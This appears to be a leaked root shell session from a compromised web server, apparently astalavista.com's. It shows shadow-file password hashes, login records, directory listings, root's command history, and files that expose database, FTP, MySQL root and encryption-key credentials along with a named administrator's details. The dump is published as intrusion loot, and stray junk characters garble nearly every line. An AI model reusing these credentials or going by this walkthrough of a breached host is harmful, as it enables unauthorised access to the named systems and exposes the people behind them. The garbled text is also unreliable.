com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
! o! o* F0 T) U! V% d) oastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
: m0 ~! l3 z& x, I; t+ R* [# ~$ f0 g3 }0 y$ y& Y
sh-3.2# cat /etc/motd
8 p1 W. ?. G$ s; B$ Z0 U$ e/ j& z#####################################################
4 ]0 l+ w/ B8 X+ w' e#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #/ a8 o, T- X; H7 Q Y
# |__| [__ | |__| | |__| | | | [__ | |__| #
" Y8 [/ D( w3 k U d* K# | | ___] | | | |___ | | \/ | ___] | | | #
* n! o$ u2 S0 }) L c# #
/ a& A1 i' Q- W5 ^/ k#####################################################* s l$ f }% e! B k, n4 I; Q' e
# #
5 [2 p5 k/ M4 _# Admin Contact - 链接标记support@secureservertech.com #
; e& T) g2 ?/ H9 L1 c( V) { I# #9 O5 ^, X6 u9 p4 S# s
# Available ShortCuts #
' p% F5 j1 N" S8 [# #' O0 e. r7 s! W3 z& a
# nst - list active connections #! q6 t+ T7 [3 p2 u9 F# |# Y
# ddos - shows how many times each ip is connected #
% L( ]- E: N7 Q" i& v4 D# ltr - restart the webserver #+ r- }- s! a+ S7 l5 E
# phpc - edit the php config file #
% R! [% E. A6 N* T6 C8 t$ c' `# htc - edit the webserver configuration file #6 {8 L4 E: l1 \
# up - uptime #9 |: k6 g: G7 s# V% A& w" n9 l$ a
# etd - edit the motd of the day file #2 ], V4 m; u- g7 q( }
# htr - start and restart apache if needed #
" T7 c9 S: z% J: \. G. u& p# syng - shows active SYN_RECV connections #! c; P E' \) S) P6 \1 B+ |
# synd - syn flood blocker - “synd -h” for usage #/ n" h. q# P# X$ b% v" G1 X8 T5 |( D
#####################################################7 e ^- G& g4 e6 V0 w) o* k$ U
# NOTES: #
; J. b& } D( f# Last Upgrade - 12-08-2008 by JF #
4 U/ A8 f- y. B# My.cnf/Mysql Optimization - 1-28-09 #
2 C! i& G3 Z. ]& J3 V1 }# #" t' a9 p+ e+ |3 {1 N8 P
# #
0 Q0 g6 t8 W+ E8 @# d5 _! t# #
* ?/ d, X, T4 l4 ?0 }& _. }) {#####################################################
, i6 j) B/ S8 W5 }; ^
) J+ a1 m3 _( q6 X; Vsh-3.2# lastlog | grep -v Never
9 ^6 H) F, d% q3 ?) f( t! |& Y$ YUsername Port From Latest
# ~4 Q7 s' y7 p+ c* N* rroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009- t& h0 Z8 w! B% y, K3 c, Q' g4 ?, { }
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008; z2 N! X+ J) ^0 [2 J% p1 ], t
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20093 O! K) F% S* S% f- A3 b
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009# [) A0 k) E8 |! k* L( J
9 I9 p/ c- t7 Z* c5 S Ksh-3.2# ls -la& i4 I7 O6 a3 C- Y
total 4533760 B9 `6 ]4 s; |+ z* n4 w
drwxr-x— 15 root root 4096 Jun 4 08:40 .' ?6 e) E( I1 i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( k& x% g% e' }3 o* ~( R
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip z+ p+ w8 \# A9 P! q8 A
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg: Y7 a V/ Q8 J/ v; z. o! z, M0 K
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history8 H6 P" _$ @3 l3 Q* e
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout8 ~# \0 c, `! j
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile4 T1 c& a# H8 ~$ g
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc1 Q7 i R/ U1 \6 h4 k: g
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh( ?' c5 E* u/ ~2 M; A5 P9 c2 b. E
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
5 h. Y! L4 N k0 }-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql4 _' `, s0 s. S6 i. o E
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan! L. B! E4 }, W" j
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
8 e! k+ n* r4 p-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
; u1 O& V; L' ddrwx—— 2 root root 4096 Oct 28 2007 .elinks& {; \0 c9 P4 x7 F
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1" n; M5 N, s7 w0 |3 {
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2% t& i/ ]7 h _# ^. p: C1 `( n* A( @5 e
-rw——- 1 root root 0 Apr 16 13:19 .history
+ p% D( ?$ [! Y _. L' \1 w, F-rw-r–r– 1 root root 16095 Sep 11 2007 install.log2 u' _- K& m4 V( W$ y. p3 L6 [
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
( R& C. ~# L; ^/ L/ a-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
+ I! E( Y# l) B4 X* B! i-rw——- 1 root root 35 Jun 2 14:23 .lesshst3 ]6 h* F* A/ ?" {1 r
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
* F+ j6 I; t* h5 udrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
, Y2 U, G0 T( n0 V9 I* T; B-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
9 U* D! E! i$ k3 |' g-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
7 z- j: H5 D( I! J! T9 ~# [# \& G-rwx—— 1 root root 760 Sep 18 2008 lp
% k; ?+ F( k% U4 W9 ndrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.12 h' v J% H# U0 t; b
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz8 L3 ?9 q% ~% J) x `& ~1 r8 E
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
, d1 z" a7 Z" odrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.94 h5 o6 }( g+ U/ \
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz3 C; F E' x5 s
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
% `# l, u4 o; U& e: I: t0 `-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
8 |2 t# Q' V( R+ l" U: H-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
& R% x$ J4 E/ h/ @9 ^-rw——- 1 root root 41 Oct 19 2007 .my.cnf p% V- \/ Q. x$ x2 n; V( O* l5 S$ d# E
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
+ s5 C0 L [1 I, _& l7 j-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport/ c: l- s" u- l# }; o: e/ I6 K
-rw——- 1 root root 41 May 20 2008 .mytop, g2 ?+ [% i# ? F# J; z
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
- H3 c+ k+ Y3 Y8 u* X8 R1 ^1 j5 L-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz* ]2 O/ c7 y& O: C4 K
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
2 t& Y$ A& c/ {' ~* h2 }: y- s0 @-rw——- 1 root root 1462 Sep 21 2007 opt.php
& y& S6 k+ g' |' j! L# @9 r-rw-r–r– 1 root root 3371 Sep 22 2007 p* T- [+ o5 O# \; h4 h) H
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2* h$ \) T3 f% b. v) N/ J' r0 I2 w$ i3 n
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
: J7 |! Z. r( a* d3 i$ g4 M& m0 i+ b-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
, v- `% v# \4 E5 T4 z& T-rw-r–r– 1 root root 887 Nov 28 2007 server.key8 L% v9 w! [, `( T1 O& a9 x1 _8 S
drwx—— 2 root root 4096 Oct 10 2008 .ssh
* Y- X8 q8 I% I. q-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat% P% a$ p9 S; E
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc6 L+ ?* w! h8 A* l8 \8 Q/ {! U4 P* _
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip! E, q( ~1 Z+ s
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
' a: a/ f" M. Edrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
* ]( \+ p# J/ _% Q4 y' k-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh% k b- i8 F7 S; e6 J( O# {5 `
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
$ E4 b$ P* k" {* i5 J-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
- m+ ` z& g+ X3 y: `: z" s-rw——- 1 root root 12997 May 16 2008 .viminfo
5 r% J2 r* C P6 T- h2 g
% G. m, I$ I2 x6 C% a; p" k' Vsh-3.2# cat .bash_history
# ^$ A5 u# r) O: C[snip], i1 M3 S5 C$ ~1 d4 O
wget cp4sst.com/sstlinux.tar.gz
& P+ B2 A# ~6 u3 d+ Ptar zxvf sstlinux.tar.gz9 F& c1 \0 ^( Q! e* [) O- Y
cd linux-2.6.27.107 `9 n/ v, b* b) @' S
sh install.sh: R/ c* l! k7 a+ D8 E
make bzImage ; make modules ; make modules_install ; make install
3 N3 j& [+ D' D3 O) G" ?0 v, `1 gmake clean& ^/ O/ l6 V# g! G
service mysqld restart
. H) M0 q% H6 T+ ^- W[snip]. a, z, l% r- d5 \# ~! c* Z$ S
cd /usr/sbin/
* c+ r" q, r+ f8 ]; K: o: L% U6 ]! Echmod 4777 traceroute+ o) h& \! s) |/ j1 l+ L" _" B
chmod 4777 ping
; N$ h( V7 e! c* ~traceroute -I 链接标记[url]www.astalavista.ch[/url]
( J* I% t4 L8 H2 J4 `- f[snip]
2 x L+ v* k4 a* E+ Lvi /etc/csf/csf.conf
3 T. q1 [: w" U1 O" k, P, B% u @traceroute google.ch
, W3 r+ ]/ U0 b! h; t& Y3 Tservice csf restart# p/ i# e3 W* F$ w" X7 q9 _
tracert google.ch4 Z& h3 S N+ X) K* W
service csf restart& s# z4 L0 q0 d' E% v" J8 _4 @& p
traceroute 链接标记[url]www.google.ch[/url]
8 o$ d7 F' Z! @. @* P, ^tracert 链接标记[url]www.google.ch[/url]9 S+ E& p; {% z. z& P( r' @5 n
traceroute 链接标记[url]www.google.ch[/url]
/ E! [& D L. f4 f. V, f7 l* |locate traceroute
+ ]2 G/ ^6 |% v; P/ h; Ochown 4755 /bin/traceroute
8 `- e* G5 m- _; W. C' Achown 4777 /bin/traceroute
6 J3 {! s+ W* h# j, \4 T1 }locate ping- e! e, m& z- k5 x9 M+ V
chown 4755 /bin/ping
2 M$ T4 B- W$ G' d) G& C# Zchown 4777 /bin/ping
" R7 e' x5 |: l2 ?) Ncd /bin/
1 b- l* \$ l* q! o- k2 Wls -ali | grep ping; x* ~8 d! m I) I, N
chown root ping$ D4 f( a4 u) [1 W1 _! k6 ~- P! E, i
chmod 4755 ping* A# t: M; c7 I2 ~/ T
ls -ali | grep traceroute4 R( {! {! Y' ^# u
chown root traceroute# g- Y, T. K' b
chmod 4755 traceroute9 `1 e! V0 b( o I$ V7 ~, G
ls -ali | grep traceroute; ~* }2 j7 K' W) ~
traceroute -I 链接标记[url]www.google.ch[/url]. I& t7 k0 q2 B! \
traceroute 链接标记[url]www.google.ch[/url]6 y1 y8 [* e' S0 @/ L1 y
whois pmsantos.ch
+ V: ^$ a$ K9 Y$ F" c+ q[snip]
: F; C ]: Y8 U2 M; K; [( |% W, Vmysql -h com_contrexx2_live < /root/defaultp_ports.sql
# p- E C+ o# I$ X/ J2 Lmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql5 c w: c# b0 b& {% P. z
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql) H/ V) G5 @; a0 M8 D
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
- @0 U& b9 Y/ l2 j9 Q2 xtop# r; s# S: P. d) ^: \
ping ssth.ch
: G# {% W8 |6 Z5 D" zping asdlkfaljgasd???ljg???lasj.ch" } A$ \, {; t8 q$ L9 L( T$ r
ping asdlkfaljgasdlasj.ch3 `& ~/ f: z1 |
ping 链接标记[url]www.ssth.ch[/url]/ m0 G$ K# W& [( U; ?) U. G
ping ssth.ch/ U% i$ y+ S2 S% P: D$ ~. p9 F# ~
nslookup 链接标记[url]www.google.ch[/url]" E9 e/ O) X8 W3 K6 Q. }4 I
nslookup 链接标记[url]www.ssth.ch[/url]
* k$ M" k$ h/ Q( rman nslookup
- M+ y0 E: i" Q# _& vping 链接标记[url]www.google.ch[/url]
. d$ P% F6 p8 C# Unslookup 链接标记[url]www.google.ch[/url]+ _' d: Q! R9 E% {
nslookup 链接标记[url]www.google.ch[/url]
* I+ f9 i6 [1 K# e4 e, ~) dnslookup salfjasdlf.ch
* H" i9 E9 \- b8 p. k[snip]
* F$ e2 w$ {. K# {openssl passwd -1 sadf6 Q9 W! w- |! O+ s
openssl passwd -1 5cZNHstdTy
# Y( A8 I; a. `% k0 gmysql
) O$ g, }; v8 m, b2 z0 ~mysql6 @" O0 W2 |' @
locate proftp
" u" E' t# X/ v7 r- w/ Hvi /etc/proftpd.passwd
8 A+ ?6 O. l1 d9 G) L4 l+ D: Eservice proftpd restart; x& P& T1 Z( T/ u5 K* D, p
locate proftpd.conf
V+ b# k) j/ |5 m& Q5 N1 v9 Qvi /etc/proftpd.conf" _+ \ s. u6 r2 p J: z7 h! ?
vi /etc/proftpd.passwd6 c" R0 Q5 A- }. ^0 C" l+ z, f, [
service proftpd restart- x9 f* r. U/ L- L$ P2 \
[snip]
- k! l! o3 x9 w6 Y/bin/sh /home/com/backup_system/backup.sh
8 j: B5 S2 E! ~6 `8 d/ U$ otar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
5 a2 K4 i* X6 l) T/ Z' lmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
. u4 [ M8 A X6 N' ^mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql: X7 N' a# q+ T
ls -ali) B( y! _) o( I* [: @
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
9 w/ c" ~7 x ^7 { Q( F9 M) d1 Hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql+ j. j, N9 V7 d/ p1 b3 k5 E, \
crontab -l9 o6 r5 B- @/ c6 [0 `& [' a; j
crontab -l
( c- S/ q! x5 Y0 {1 S% qphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
1 T6 {0 {; k q/home/com/public_html/modifications/cronjobs/exploits.sh! T( a/ S# a; N
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
( R" |( p/ d; K- ~& y# Ptar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
$ v# ?4 g0 _6 R2 p5 K* R# ^cd lsws-4.0.3
. d3 o" o# y8 d3 I: p* }sh install.sh+ A5 Q. m& `5 l8 m( |! Q
uptime
8 T* j' h. n8 Q+ G3 R& Lhdparm -tt /dev/sda) ~$ N; d8 i: E" v
iostat$ K- A4 w8 O6 {, W# K
yum install iostat
% O f2 V2 d& {, r; ^4 Uiostat' C# l4 L" R; c
whereis iostat
6 Y+ c4 A5 `) |9 d0 v S- Ayjm clean all& |4 F; |+ z0 ^% ~
yum clean all ; yum -y update
: n$ O0 u" G6 _2 ?$ Y# i$ Eiostat$ i) Y! N8 i+ ]: T
yum install systat
& T, H: c6 l$ Irpm -qa | grep iostat
% {8 x+ b. q1 Rrpm -qa | grep sysstat$ P, s9 u! k% C. \2 w
rpm -qa | grep systat
& ?# y, |6 C: W) |- Zdmesg -c; B- E: \# ? E# M( L5 i+ C
sysctl -p
$ D4 V/ P3 g5 tuname -r: g. S% k2 o# w) V# f1 b4 s
cd /usr/src
2 q; Q. F3 U$ W( Dwget nix101.com/kernels/sstlinux.tar.gz% l, N" U; @* \/ r$ a: Y! T9 D9 E
shutdown -r now
/ N; v! E9 l6 s W$ Unano -w /boot/grub/grub.conf
& Q- F# X4 X( V2 r& A/ w
& I* S9 r9 w4 n; U* ? Msh-3.2# cat .my.cnf. t6 k# p% \' t' [; h4 t3 s
[client]
; V) N# P8 m% I) w+ O: F5 S7 luser=da_admin1 ^% H, O+ T* v' Y4 j
password=X9dctmRH
7 p! c0 q+ R5 H) w6 L# H1 _
. ]! [! J) y, S# a' `' gsh-3.2# cat /home/com/backup_system/backup.sh8 I# F7 [0 g5 J0 l& W
#!/bin/sh5 t$ w# w5 V0 \( g/ x
#####################################################################" G* ?& n' }* K2 Q7 z/ J% P/ g5 d7 N
# #
1 p. c9 w7 m- Y- u' A/ x2 k# incremental backup for astalavista.com #& a/ u3 Y5 H+ w3 K! Y7 l& z! f
# #! V2 |( L9 K$ G- b) l, \& K/ S& r
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
3 N- y* M0 C' ?! e# #
" a& x& h7 t9 `3 \4 R#####################################################################
, W, O! E$ q- ^ ?* k[snip]
/ _& y5 @; b6 g( Q. t4 V* [' OPROG_DIR=”/home/com/backup_system”; ^$ a1 L1 M1 @% r9 o8 i' q
BACKUP_DIR=”/home/com/backups”;
& t. R( C! f H! h" dDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;2 p4 _0 i% P: F; ?
# ftp for synology backup server1 y; s3 W$ E- v$ B+ ^8 M
FTP_HOST=”212.254.194.163″;
* b9 U$ G' N9 O* c: I2 ]FTP_PORT=”21″;6 ~" M7 }9 c; r3 R
FTP_USER=”astalavista.com”;
: R* Z' m) ]$ a: F3 o; |FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
. F' c, g" i/ g& @. \( T; k3 aFTP_DIR=”/astalavista.com”;- E) I' R6 A# K! z$ [
# database0 E8 J8 B/ {' |9 A4 ^( A) {( n
DB_HOST=”localhost”;
0 z, t0 ]) Z, R ^, n5 Q$ }DB_USER=”contrexxuser2″;
, A; u0 b( [/ ZDB_PASS=”0fEYNZgXz1pKe”;
. G( N0 Y7 I0 J1 e5 B* qDB_DATABASE1=”com_contrexx2_live”;
1 g/ c9 u" U6 ? B& V8 h* xDB_DATABASE2=”com_contrexx2″;$ T6 E1 r! w' n
[snip]
- a, m6 J4 h7 c" d7 }1 ]1 iftp -in $FTP_HOST $FTP_PORT <<EOF
3 w- y6 F N2 ?quote USER $FTP_USER% a1 S. k. ^" M' y4 ` ~
quote PASS $FTP_PASS# \' O4 W9 j3 q1 e! ^+ o0 ]' v# t
cd $FTP_DIR& q& W8 V- t% A3 `
put $DB_FULLNAME-SQL_Dump.tar$ I/ c% y5 Y/ W/ |3 m: U
put $BACKUP_FULLNAME-Public_HTML.tar4 r: N5 D- J0 q/ C1 m5 Y V
close/ q" `8 ^$ E. [- f
bye
7 z& a( U; c0 q; i% p/ i2 |3 ~1 PEOF
7 g0 G* T+ M$ s1 b `$ h0 j! @- ^% b0 ]! T9 K
sh-3.2# cd /home. g \9 l' W8 h; u: v
sh-3.2# ls -la
1 z! O. c" J4 ctotal 1209 q/ ?% }, q7 n6 q( _
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .) ]6 ~' w/ o. o1 [: W" t
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..- j; L% X8 Y3 C9 p* D# \! ]8 N- q* G
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
$ j' @) n. R' z7 T' Y8 w' f3 P0 u-rw——- 1 root root 8192 Jun 4 03:03 aquota.group7 W1 u/ C4 ]8 }8 l7 P5 U4 B) S% R. y0 `
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
. i7 _% \, a2 M/ @& k8 u$ ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet2 @* A" A$ B; e7 {/ Y
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
) s5 l$ V& _! H4 K ldrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161. C; P+ x. f1 C+ E( s
drwx–x–x 10 com com 4096 Apr 28 12:40 com
/ z$ q* s* ?! A# p2 rdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
' V& j5 r5 ]; bdrwx—— 3 jon jon 4096 Sep 21 2007 jon( }/ N; k6 E* \7 l" c
drwx—— 2 root root 16384 Sep 11 2007 lost+found
/ q' C& O; D9 Y% U5 I. sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
# E. A: R2 y8 ?1 D6 z" Jdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata1 m! G" u4 i2 Q- f( p( G% d6 s
drwx—— 2 jon jon 4096 Sep 15 2007 test
) V+ r2 ]7 y$ o( M/ L9 z3 xdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
. Q H( V7 a4 W: p, i2 l6 `3 F; p9 H+ M3 _
sh-3.2# cd admin
: e6 i/ Y. w3 }1 Jsh-3.2# ls -la3 u( t! ?3 R2 {7 r
total 1735896
% F9 }5 { D" I S ~7 Z# `2 B: vdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
0 }6 e3 d, j$ ]0 J7 ~' H! bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: e& @& c9 e9 |* X
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups7 g9 t2 `+ u/ |8 I3 h* F- ]( E5 Y
drwx—— 2 admin admin 4096 Sep 28 2007 backups, R" u9 k; g* ^; w
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history4 _; T# v1 }- T' p
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout4 A" s* s' @$ T3 B3 x
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile+ X; g& I* W- O& Y
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc* `6 u4 p, I. C& d8 W5 T) g
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups8 t; O- e/ h' V3 h, l& y, m' H
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
& J( Y4 A# s7 i9 edrwxrwx— 3 admin mail 4096 Sep 21 2007 imap0 P5 x5 ^/ y* b$ {5 I; g: o
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
+ W3 ^2 o& e# E3 P. q. m4 I) {drwx—— 2 admin admin 4096 Sep 21 2007 mail3 R7 p" \" S+ n$ J _+ P
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
+ ?( ~$ D/ M' W, q, ]-rw-r–r– 1 root root 887 Nov 28 2007 server.key, g. g( z. I: D! _
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow$ S; [' y' X6 g0 m: \
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
# M7 C" J* r5 U$ Ldrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
3 R* L: u" U# O* s; H7 P
: j! B, c# ~5 I. ~/ T, ssh-3.2# ..7 k! N/ @% c; q
sh-3.2# cd jon: k% d+ c: v) g5 L5 y
sh-3.2# ls -la" f8 M0 V7 f5 N- |+ G H. F9 f
total 36/ R) [" B) u% l( t
drwx—— 3 jon jon 4096 Sep 21 2007 .
' Z h. w" L$ ?2 _1 W. Zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' N4 c- A) b- l+ {; J
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
1 m4 T& T0 P* ?-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
h2 P) C/ K/ `; f) x8 k7 k5 D-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
* e: r ^8 F; ?3 c: E-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
2 ]8 F% P% Y. j-rw-r–r– 1 root root 24 Sep 21 2007 info.php4 j% u% c1 i. @, Z+ g4 r# I/ T& O
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html' b' l' U+ D; T# m& C$ t
; z: F. s! b' ysh-3.2# cd ..
k5 H( H/ X/ G/ K1 R1 Ish-3.2# cd test
$ m) x6 [1 K/ c; Nsh-3.2# ls -la8 P. O8 f _! c4 `5 }" [0 `
total 48
3 g0 I" d4 c$ e4 x9 m3 c9 Z% Udrwx—— 2 jon jon 4096 Sep 15 2007 .
4 j/ ^5 P& Q j- _drwxr-xr-x 14 root root 4096 Mar 11 17:56 .., l$ E; d. i" I$ i6 Q5 [
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
8 h" w# H) b& @-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
7 y8 E5 a a) b# i" _( D-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile: J* d0 k1 b0 m) p& I
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc; @' j# w0 a9 M+ _
sh-3.2# cat .bash_history D8 M' k( b5 f6 x3 ^; r7 k8 x v
/usr/bin/mysqladmin -u root password PoliuJhytg676 ~. [- E) y- h/ P* T' r
& |& Y: o2 q* Y+ o0 dsh-3.2# cd ..) f$ k2 n" [8 m" y4 D2 V* f. U
sh-3.2# cd astanet( j/ x- ?1 z0 B+ A3 N: C
sh-3.2# ls -la. R, U- \0 }2 ^ P+ u% e
total 52& E7 D+ |! d1 k, u
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
5 [% w1 Z6 J; Z8 odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 _7 z! q# e" T" {0 G6 b' M( u- Xdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
( L0 y: C0 w& @) u1 M-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history7 T8 d! R- q6 b) K" s( u% Q
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
0 H% V8 y9 a$ {. ?7 a" N) w- ^-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile, g9 \, E9 N2 X. P5 `) w
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc {5 c, D. G) I# k3 a/ \# ^
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
6 Z/ D. m7 R% u4 [+ b% X4 sdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap4 N% Z: l; c( j% C9 S
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail5 d8 Q3 ^& r- s' J: t
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history+ g, z5 L2 s; U, i! V6 c# u
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
) T3 q; g& P1 C8 d8 h, T& l-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
5 n5 o3 l6 M% d; ~: W C# H0 D3 W9 Z$ \! [3 O( t( S `# N
sh-3.2# cd auth/
/ |! H( Y0 n' T( Osh-3.2# ls -la
; G9 t& G& i+ V! h- |total 28+ p7 i# y' S P# [
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
3 g' Z+ E% b7 o4 \) wdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
q: w" o: Q! R3 i; O8 X1 v7 }-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
( o$ L- M& K, Q* R1 ] A-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php4 S+ A) c- ~+ E1 s, s+ }
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
( `& `) W4 p V" n5 R$ n4 r7 \-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
* [2 h0 k9 b" n% x-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
5 J5 j) d6 j. L h" F/ J
/ _( S% O1 y0 M4 Bsh-3.2# cat hackercontest.config.inc.php* g6 C4 `1 y! @6 g. G3 B, [
<?PHP
( P% r% l: P# t. d* ^// Variabeln f?r Verbindung zur Datenbank //
8 h6 ` m8 i- z$conxHost = ‘localhost’; // MySQL hostname
" @% J7 _ c' J/ Y2 X* |2 a t$conxUser = ‘hackercontest’; // MySQL user
# i$ P5 _' Z" e; G9 t$ O. A% `" t$conxPassword = ‘K6m@7dUc’; // MySQL password
) X5 r# g9 x2 p" X% h$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish" V0 O7 i1 X+ B7 j& {, M7 B
?>
# F. t+ }& O- O, K9 v! nsh-3.2# cat hosting.config.inc.php# m7 ?6 R V/ n `. P! N
<?PHP, @# ^' X3 q4 r0 C9 Y5 f
// Variabeln f?r Verbindung zur Datenbank //: R+ B1 @9 z+ b3 ]$ m4 J
$conxHost = ‘localhost’; // MySQL hostname7 R- u. L: N3 l) k, X
$conxUser = ‘hostinguser’; // MySQL user
; E9 J' @8 {/ T1 m3 f6 m" J2 v$conxPassword = ‘cXvB3981′; // MySQL password
